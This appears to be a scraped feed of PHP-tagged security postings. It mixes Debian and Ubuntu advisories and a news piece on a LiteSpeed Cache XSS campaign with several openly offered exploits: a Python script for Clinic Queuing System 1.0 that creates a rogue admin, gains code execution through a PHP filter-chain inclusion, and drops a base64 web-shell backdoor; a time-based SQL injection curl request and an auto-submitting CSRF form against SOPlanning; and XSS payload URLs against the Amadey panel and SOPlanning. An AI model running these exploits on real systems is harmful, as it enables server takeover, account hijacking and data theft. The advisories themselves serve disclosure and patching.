Panel Amadey.d.c malware suffers from cross site scripting vulnerabilities.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/50467c891bf7de34d2d65fa93ab8b558.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Panel Amadey.d.cVulnerability: Cross Site Scripting (XSS)Family: AmadeyType: Web PanelMD5: 50467c891bf7de34d2d65fa93ab8b558 (Login.php)SHA256: 65623eead2bcba66817861246e842386d712c38c5c5558e50eb49cffa2a1035dVuln ID: MVID-2024-0680Disclosure: 05/09/2024Description: The Amadey C2 web panel is written in PHP for remote administration capability. The Login.php webpage accepts HTTP GET "l" and "p" parameters which are passed to the backend server side code: $_GET["l"]  name=\"login\",  $_GET["p"] , name=\"password\". However, there is no secure coding practice of filtering input or sanitization of output. Panel users who visit a third-party attacker website or click an infected link, can trigger arbitrary client side JS code execution in the security context of the current user. This can result in data theft or GEO location disclosure of the user accessing the Amadey web interface.The submit button contains the text "Unlock".Entering incorrect password results in URI of "?wrong=1" and displays "Wrong login or password", after a few seconds delay redirects back to Login.php.http://127.0.0.1/Panel.Amadey.d.c/Login.php?wrong=1Wrong login or passwordThe web panel HTML source code for the URL "Login.php?wrong=1" contains the letters "CC" plus the Domain/IP within brackets[x.x.x.x] within the HTML title tag. %3Ctitle%3E CC [127.0.0.1] %3C/title%3ETested successfully in Firefox.Exploit/PoC:Vulnerable parameters: "l" and "p"http://x.x.x.x/Panel.Amadey.d.c/Login.php?l=%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ehttp://x.x.x.x/Panel.Amadey.d.c/Login.php?p=%22/%3E%3Cscript%3Ealert(666)%3C/script%3EDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Panel Amadey.d.c MVID-2024-0680 Cross Site Scripting

Clinic Queuing System version 1.0 suffers from a remote code execution vulnerability.

    # Exploit Title: Clinic Queuing System 1.0 RCE # Date: 2024/1/7# Exploit Author: Juan Marco Sanchez# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/16439/clinic-queuing-system-using-php-and-sqlite3-source-code-free-download.html# Version: 1.0# Tested on: Debian Linux Apache Web Server# CVE: CVE-2024-0264 and CVE-2024-0265import requestsimport randomimport argparsefrom bs4 import BeautifulSoupparser = argparse.ArgumentParser()parser.add_argument("target")args = parser.parse_args()base_url = args.targetphase1_url = base_url + '/LoginRegistration.php?a=save_user'phase2_url = base_url + '/LoginRegistration.php?a=login'filter_chain = "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=home"def phase1(): # CVE-2024-0264  rand_user = 'pwn_'+str(random.randint(100, 313))  rand_pass = 'pwn_'+str(random.randint(100, 313))  pwn_user_data = {'formToken':'','fullname':'pwn!','username':rand_user,'password':rand_pass,'status':1,'type':1}  print("[*] adding administrator " + rand_user + ":" + rand_pass)  phase1 = requests.post(phase1_url, pwn_user_data)  if "User Account has been added successfully." in phase1.text:    print("[+] Phase 1 Success - Admin user added!\n")    print("[*] Initiating Phase 2")    phase2(rand_user, rand_pass)  else:    print("[X] user creation failed :(")    die()def phase2(user, password): # CVE-2024-0265  s = requests.Session();  login_data = {'formToken':'','username':user, 'password':password}  print("[*] Loggin in....")  phase2 = s.post(phase2_url, login_data)  if "Login successfully." in phase2.text:    print("[+] Login success")  else:    print("[X] Login failed.")    die()  print("[+] Preparing for RCE via LFI PHP FIlter Chaining...\n")  rce_url = base_url + "/?page=" + filter_chain + "&0=echo '|jmrcsnchz|<pre>'.shell_exec('id').'</pre>';"  #print("[*] Payload: " + rce_url)  rce = s.get(rce_url)    if "jmrcsnchz" in rce.text:    print("[+] RCE success!")    soup = BeautifulSoup(rce.text, 'html.parser')    print("[+] Output of id: " + soup.pre.get_text())    print("[*] Uploading php backdoor....")    s.get(base_url + "/?page=" + filter_chain + "&0=file_put_contents('rce.php',base64_decode('PD89YCRfR0VUWzBdYD8%2b'));")    print("[+] Access at " + base_url + "/rce.php?0=whoami")  else:    print("[X] Exploit failed. Try debugging the script or pass this script onto a proxy to investigate.")    die()try:  print("[*] Initiating Phase 1")  phase1()except:  print("Exploit failed.")

Clinic Queuing System 1.0 Remote Code Execution

Debian Linux Security Advisory 5685-1 - Several security vulnerabilities have been discovered in Wordpress, a popular content management framework, which may lead to exposure of sensitive information to an unauthorized actor in WordPress or allowing unauthenticated attackers to discern the email addresses of users who have published public posts on an affected website via an Oracle style attack.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5685-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
May 08, 2024                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : wordpress  
CVE ID         : CVE-2023-2745 CVE-2023-5561 CVE-2023-38000 CVE-2023-39999  
                 CVE-2024-31210  
Debian Bug     : 1036296

Several security vulnerabilities have been discovered in Wordpress, a popular  
content management framework, which may lead to exposure of sensitive  
information to an unauthorized actor in WordPress or allowing unauthenticated  
attackers to discern the email addresses of users who have published public  
posts on an affected website via an Oracle style attack.

Furthermore this update resolves a possible cross-site-scripting vulnerability,  
a PHP File Upload bypass via the plugin installer and a possible remote code  
execution vulnerability which requires an attacker to control all the  
properties of a deserialized object though.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 5.7.11+dfsg1-0+deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 6.1.6+dfsg1-0+deb12u1.

We recommend that you upgrade your wordpress packages.

For the detailed security status of wordpress please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/wordpress

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmY78XJfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeRBIBAAlHttuzHU3awlLA5WFHprj6S3PJA2YQSQjt+Ejk+pFGVpHjs4/gaI8S/t  
3rb9hEf2ClK6NdNxqAHSNzOuYLAG3S1rfATtQGfxEpYTBrngXKSUgFltElhRBACe  
GOLxtfh7Yha94hbf/HBiFEpKEmFXLnmGuSv1M0z77SEcNEdQ0sd5Be5VDwKcxnY6  
FYrrvoFjYUiDj66B19/B8ytUlRb7Mgr8KakqOiO6jzINL/mtJ52pcd63+JrkBF0L  
8br30YKxII9Rb10ygBhl5AzjhC/yrQexVtYyK0l1avm7/JC08kxDch++ANRekCJA  
kTx0ARi2AZJv1ktzm1DIfxNLrLtiCTJjSFFi6/WTCW3UAFNiVbEQOYal95lKBLXG  
V6AJhYYYPI3rbwnUJX5FZn4PEKoHTXotuveqdGHF2727ROUrConLZrrBa/hovj7v  
GPIe4SZZHLizK2CO84Gxgy7mI4F46I2C6TlIMvsJKyL1XUopti+Ds8f7e5AIgzB9  
rSkYPTBfLsm5fIeVpodja1qJMQdo9NklnamaPnbjL8BTmExedf638WYJfMLBqgXY  
Kl9M6uSwfBpl2dfvKqg2iUos359X65Nt+Cd3Ve5zsSigDssvsQ7YTV/TJHMavq6z  
f294k2zHfMaCiathCpOayN8KFX7WHeBEL8N8j/bukYgFaHD8y5o=qCem  
-----END PGP SIGNATURE-----

Debian Security Advisory 5685-1

Debian Linux Security Advisory 5682-1 - Alicia Boya Garcia reported that the GDBus signal subscriptions in the GLib library are prone to a spoofing vulnerability. A local attacker can take advantage of this flaw to cause a GDBus-based client to behave incorrectly, with an application-dependent impact.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5682-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
May 07, 2024                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : glib2.0  
CVE ID         : CVE-2024-34397

Alicia Boya Garcia reported that the GDBus signal subscriptions in the  
GLib library are prone to a spoofing vulnerability. A local attacker can  
take advantage of this flaw to cause a GDBus-based client to behave  
incorrectly, with an application-dependent impact.

gnome-shell is updated along with this update to avoid a screencast  
regression after fixing CVE-2024-34397.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 2.66.8-1+deb11u2.

For the stable distribution (bookworm), this problem has been fixed in  
version 2.74.6-2+deb12u1.

We recommend that you upgrade your glib2.0 packages.

For the detailed security status of glib2.0 please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/glib2.0

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmY6hPhfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0SluA//YDiwiCjSmeQFXuFfSBga+BnPqAx5PHWjPbnjOyTefp6TH0xXiw0mQ2vF  
5c99+cwy1kQkWffYJErX7XyLeoaOHxanXOUzyqhCLBH7iJFWIDiKDntYsd1BELDo  
2H+9zOISltTowkcx9H0tq3HKM18SFHc/iiImc28wX6PdkosqGHGtTFF/qPOEDqi1  
oqObyJV+F0RjGSiTE3qzF6zxmJHrn8oCvQ53L3VbspL+eohfCurkRMjLeg897Opo  
A67Eh82ZhUouKIBNRNZ6UGVsJ55vKWsYdyvC2zi4e9dbUSumijcPr2kci4C3Rb1M  
e63SYSL3xWA42z7LbtOdJZh0l7HcHZHDSw4UKhPw6jrCl+4ck5fQN9ezuGU5Rg8d  
5oUjuDRIvH6G1vGELd6+P90hj/c+z23g3N41J05YWsLr1imoYuc/zHAHFlpt7NzI  
dJRczbKl0SUcxQGnevDmgj5LNmqTQvH/Q9t+d8jy6E8n1OP2IweMn+Tiit4abEGN  
9bKAc09/qUhKwGrnHFfi7S9lPF9rpQun+voVylacrQsf2ijs2sgWX0kyH81Govxv  
s/QbTNUJUkXrQmAIahFQPzqEokdZd4phP1w25urjEx1ji7RklR9KtF6bBu6V1mhz  
fZ1Md3uhUt+8Vktbqwzfj18lvEXYg808ClX7ZA+x5cgTOJJKf8o=uIf7  
-----END PGP SIGNATURE-----

Debian Security Advisory 5682-1

By Deeba Ahmed
 Is your WordPress site using LiteSpeed Cache? A recent surge in malicious JavaScript injections targets vulnerable versions. Learn how to identify the signs of infection and prevent future attacks. Patch, scan, and secure your WordPress site today!
This is a post from HackRead.com Read the original post: LiteSpeed Cache Plugin XSS Vulnerability Affects 1.8M WordPress Sites

WordPress websites have been under attack lately, with a surge of malicious JavaScript being injected using vulnerable versions of the LiteSpeed Cache plugin, claim Automattic’s security team, WPScan.

As of 2024, there are over 1.89 billion websites on the internet, with around 835 million relying on WordPress as their Content Management System (CMS), constituting approximately 43.3% of the total number of websites worldwide. This makes the CMS a lucrative target for cyber criminals.

According to WPSCan’s blog post, threat actors are exploiting a stored cross-site scripting (XSS) vulnerability in the plugin that allows an unauthenticated user to elevate privileges through specially crafted HTTP requests. LiteSpeed Cache plugin versions older than 5.7.0.1 are vulnerable to a high-severity (8.8) unauthenticated cross-site scripting flaw tracked as CVE-2023-40000, and disclosed by Patchstack in February 2024. 

****Understanding the Vulnerability****

The vulnerability lies in unauthenticated stored XSS (cross-site scripting) within older versions of the plugin. Unauthenticated XSS means an attacker doesn’t need login credentials to inject malicious code.

On the other hand, Stored XSS means the malicious code gets stored on your website’s database, infecting any user who visits the compromised page. Attackers are injecting malicious JavaScript code in WordPress files and database, creating administrator users named ‘wpsupp‑user’ or ‘wp‑configuser,’ by exploiting this flaw.

You can identify malicious URLs and IPs as they generally include (startservicefounds . com/service/f.php, apistartservicefounds. com, and (cachecloudswiftcdn . com), and malware associated IP was tracked as 45.150.67.235.

****Potential Dangers****

LiteSpeed Cache is a popular plugin, used in over five million WordPress sites for its Google Search ranking-boosting capabilities. The flaw was addressed in October 2023 in version 5.7.0.1 while the latest version, 6.2.0.1, was released on April 25, 2024. However, despite migration to non-vulnerable versions, 1,835,000 users still run vulnerable releases, indicating infection, researchers noted.

Creating admin accounts on WordPress sites can lead to severe consequences, allowing threat actors to gain full control and perform arbitrary actions, such as injecting malware or installing malicious plugins. Exercise Caution!

This development comes after Sucuri revealed a redirect scam campaign called Mal.Metrica, which uses fake CAPTCHA prompts to redirect users to fraudulent sites. 

To secure your WordPress site, update the LiteSpeed Cache plugin to the latest version, scan for malware using a reputable WordPress security scanner, and change all login credentials. WPScan recommends searching for suspicious strings in the litespeed.admin\_display.messages option or presence of wpsupp-user.

1.  5 Best CAPTCHA Plugins for WordPress Websites
2.  WordPress Websites Hacked with New Sign1 Malware
3.  WordPress Websites Being Hacked with Balada Malware
4.  FakeUpdates Malware Targets Millions of WordPress Sites
5.  Zero-Day Exploit Threatens 200,000 WordPress Websites

LiteSpeed Cache Plugin XSS Vulnerability Affects 1.8M WordPress Sites

A vulnerability was found in Kimai up to 2.15.0 and classified as problematic. Affected by this issue is some unknown functionality of the component Session Handler. The manipulation of the argument PHPSESSIONID leads to information disclosure. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. Upgrading to version 2.16.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-263318 is the identifier assigned to this vulnerability.

**Kimai information disclosure vulnerability**

Low severity GitHub Reviewed Published May 7, 2024 to the GitHub Advisory Database • Updated May 7, 2024

GHSA-6f3v-2r2j-2rpr: Kimai information disclosure vulnerability

Ubuntu Security Notice 6757-2 - USN-6757-1 fixed vulnerabilities in PHP. Unfortunately these fixes were incomplete for Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 23.10. This update fixes the problem. It was discovered that PHP incorrectly handled PHP_CLI_SERVER_WORKERS variable. An attacker could possibly use this issue to cause a crash or execute arbitrary code. This issue only affected Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS.

==========================================================================  
Ubuntu Security Notice USN-6757-2  
May 02, 2024

php7.4, php8.1, php8.2 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in PHP.

Software Description:  
- php8.2: server-side, HTML-embedded scripting language (metapackage)  
- php8.1: HTML-embedded scripting language interpreter  
- php7.4: HTML-embedded scripting language interpreter

Details:

USN-6757-1 fixed vulnerabilities in PHP. Unfortunately these fixes were incomplete for  
Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 23.10. This update fixes the problem.

Original advisory details:

 It was discovered that PHP incorrectly handled PHP_CLI_SERVER_WORKERS variable.  
 An attacker could possibly use this issue to cause a crash or execute  
 arbitrary code. This issue only affected Ubuntu 20.04 LTS, and  
 Ubuntu 22.04 LTS. (CVE-2022-4900)

 It was discovered that PHP incorrectly handled certain cookies.  
 An attacker could possibly use this issue to cookie by pass.  
 (CVE-2024-2756)

 It was discovered that PHP incorrectly handled some passwords.  
 An attacker could possibly use this issue to cause an account takeover  
 attack. (CVE-2024-3096)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10  
  libapache2-mod-php8.2           8.2.10-2ubuntu2.1  
  php8.2                          8.2.10-2ubuntu2.1  
  php8.2-cgi                      8.2.10-2ubuntu2.1  
  php8.2-cli                      8.2.10-2ubuntu2.1  
  php8.2-fpm                      8.2.10-2ubuntu2.1  
  php8.2-xml                      8.2.10-2ubuntu2.1

Ubuntu 22.04 LTS  
  libapache2-mod-php8.1           8.1.2-1ubuntu2.17  
  php8.1                          8.1.2-1ubuntu2.17  
  php8.1-cgi                      8.1.2-1ubuntu2.17  
  php8.1-cli                      8.1.2-1ubuntu2.17  
  php8.1-fpm                      8.1.2-1ubuntu2.17  
  php8.1-xml                      8.1.2-1ubuntu2.17

Ubuntu 20.04 LTS  
  libapache2-mod-php7.4           7.4.3-4ubuntu2.22  
  php7.4                          7.4.3-4ubuntu2.22  
  php7.4-cgi                      7.4.3-4ubuntu2.22  
  php7.4-cli                      7.4.3-4ubuntu2.22  
  php7.4-fpm                      7.4.3-4ubuntu2.22  
  php7.4-xml                      7.4.3-4ubuntu2.22

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6757-2  
  https://ubuntu.com/security/notices/USN-6757-1  
  CVE-2022-4900, CVE-2024-2756, CVE-2024-3096

Package Information:  
  https://launchpad.net/ubuntu/+source/php8.2/8.2.10-2ubuntu2.1  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.2-1ubuntu2.17  
  https://launchpad.net/ubuntu/+source/php7.4/7.4.3-4ubuntu2.22

Ubuntu Security Notice USN-6757-2

SOPlanning version 1.52.00 suffers from a remote SQL injection vulnerability in projects.php.

    Exploit Title: SOPlanning v1.52.00 'projets.php' SQLiApplication: SOPlanningVersion: 1.52.00Date: 4/22/24Exploit Author: Joseph McPeters (Liquidsky)Vendor Homepage: https://www.soplanning.org/en/Software Link: https://sourceforge.net/projects/soplanning/Tested on: LinuxCVE: Not yet assignedDescription: SOPlanning v1.52.00 is vulnerable to Authenticated SQL Injection via the 'projects.php' page.Instructions: Authenticate to the host, the credentials can be obtained using a CSRF exploit (more info included). Once valid credentials are obtained use either a GET/POST request to send the valid parameters that equal to valid SQLi.Vulnerable request parameters for request to "/www/projets.php":filtreGroupeProjet=1&statut[]=todo'+AND+(SELECT+8073+FROM+(SELECT(SLEEP(10)))PuxA)+AND+'Liquidsky'='Liquidsky&rechercheProjet=testThe above parameters can be sent as either a valid GET/POST request to trigger the SQLi.Example Curl Request To Re-Test SQLi:curl -i -s -k -X $'POST' \    -H $'Host: 127.0.0.1' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 130' -H $'Origin: http://127.0.0.1<http://127.0.0.1/>' -H $'Connection: close' -H $'Referer: http://127.0.0.1/soplanning/www/projets.php' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-User: ?1' \    -b $'dateDebut=23/04/2024; dateFin=23/06/2024; xposMoisWin=0; xposJoursWin=0; yposMoisWin=0; yposJoursWin=0; yposProjets=33; PHPSESSID=ovpbclvbc87uh7anfbq2luf9bi; soplanningplanning_=hhrtf0rgs562vm8rhn5i641481; baseLigne=users; baseColonne=jours; afficherTableauRecap=1; masquerLigneVide=0; statut_projet=%5B%22abort%22%2C%22archive%22%2C%22done%22%2C%22progress%22%2C%22todo%22%5D' \    --data-binary $'filtreGroupeProjet=1&statut[]=todo\'+AND+(SELECT+8073+FROM+(SELECT(SLEEP(10)))PuxA)+AND+\'Liquidsky\'=\'Liquidsky&rechercheProjet=test' \    $'http://127.0.0.1/soplanning/www/projets.php'  Note: Cookies need to be authenticated and request needs to be valid for valid SQLi. This curl request can be used with a proxy to reconstruct a valid request.

SOPlanning 1.52.00 SQL Injection

SOPlanning version 1.52.00 suffers from a cross site request forgery vulnerability in xajax_server.php.

<html>  <body>    <form action=https://fuzzlove.website/www/process/xajax_server.php method="POST">      <input type="hidden" name="xajax" value="submitFormProfil" />      <input type="hidden" name="xajaxr" value="" />      <input type="hidden" name="xajaxargs[]" value="ADM" />      <input type="hidden" name="xajaxargs[]" value=pwn@mail.lv<mailto:pwn@mail.lv> />      <input type="hidden" name="xajaxargs[]" value="password" />      <input type="hidden" name="xajaxargs[]" value="fr" />      <input type="hidden" name="xajaxargs[]" value="true" />      <input type="hidden" name="xajaxargs[]" value="false" />      <input type="hidden" name="xajaxargs[]" value="true" />      <input type="hidden" name="xajaxargs[]" value="true" />      <input type="hidden" name="xajaxargs[]" value="true" />      <input type="hidden" name="xajaxargs[]" value="false" />      <input type="hidden" name="xajaxargs[]" value="0" />      <input type="hidden" name="xajaxargs[]" value="1" />    </form>    <script>      document.forms[0].submit();    </script>  </body></html>

SOPlanning 1.52.00 Cross Site Request Forgery

SOPlanning version 1.52.00 suffers from a cross site scripting vulnerability in groupe_save.php.

Exploit Title: SOPlanning v1.52.00 'groupe_save.php' XSS (Reflected XSS)Application: SOPlanningVersion: 1.52.00Date: 4/22/24Exploit Author: Joseph McPeters (Liquidsky)Vendor Homepage: https://www.soplanning.org/en/Software Link: https://sourceforge.net/projects/soplanning/Tested on: LinuxCVE: Not yet assignedDescription: SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.Example Payload:"><script>alert('LiQUiDSKY')</script><!--Reflected XSS: /soplanning/www/process/groupe_save.php?saved=1&groupe_id="><script>alert('LiQUiDSKY')</script><!--&nom=Project+NewAnalysis: The landing page takes into consideration the user input then redirects to a page where the XSS is shown the payload included in the exploit, escapes the variable where it is held, and comments out the rest to perform a valid reflected XSS attack against any authenticated user the payload was sent to.

Tag

#php